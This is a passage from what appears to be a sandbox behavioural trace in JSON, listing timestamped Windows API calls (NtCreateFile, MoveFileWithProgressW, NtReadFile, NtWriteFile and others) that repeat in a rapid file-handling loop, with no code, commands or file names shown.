17:41:48,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", 
"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,792", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:48,812", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:48,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,842", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,852", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,882", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,892", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,902", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,912", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,922", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,933", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,933", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:48,943", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,943", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,953", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,963", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:48,963", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,973", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,973", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:48,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,983", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,993", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,023", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtWriteFile"}, 
